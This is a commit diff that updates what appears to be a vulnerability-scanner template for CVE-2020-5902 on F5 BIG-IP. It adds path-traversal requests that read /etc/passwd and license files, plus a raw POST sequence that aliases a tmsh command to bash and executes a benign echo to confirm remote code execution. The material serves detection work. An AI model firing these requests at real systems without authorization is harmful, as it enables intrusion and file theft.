Merge pull request #200 from dwisiswant0/update-cve-2020-5902

Update CVE-2020-5902 matchers & requests
2020-07-06 19:15:28 +05:30 · 2020-07-06 19:15:28 +05:30 · 8ef6e99ab3
parent 0036549365 2479e51afb
commit 8ef6e99ab3
1 changed files with 44 additions and 1 deletions
--- a/cves/CVE-2020-5902.yaml
+++ b/cves/CVE-2020-5902.yaml
@ -2,13 +2,16 @@ id: CVE-2020-5902

 info:
  name: F5 BIG-IP TMUI RCE
-  author: madrobot
+  author: madrobot & dwisiswant0
  severity: high

 requests:
  - method: GET
    path:
      - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
+      - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"
+      - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license"
+    matchers-condition: and
    matchers:
      - type: status
        status:
@ -16,4 +19,44 @@ requests:
      - type: regex
        regex:
          - "root:[x*]:0:0:"
+          - "BIG-IP release ([\\d.]+)"
+          - "[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}"
+        condition: or
        part: body
+  - raw:
+      - |
+        POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+
+        command={{url_encode("create cli alias private list command bash")}}
+      - |
+        POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+
+        fileName={{url_encode("/tmp/nonexistent")}}&content={{url_encode("echo 'aDNsbDBfdzBSbGQK' | base64 -d")}}
+      - |
+        POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+
+        command={{url_encode("list /tmp/nonexistent")}}
+      - |
+        POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+
+        command={{url_encode("delete cli alias private list")}}
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "h3ll0_w0Rld"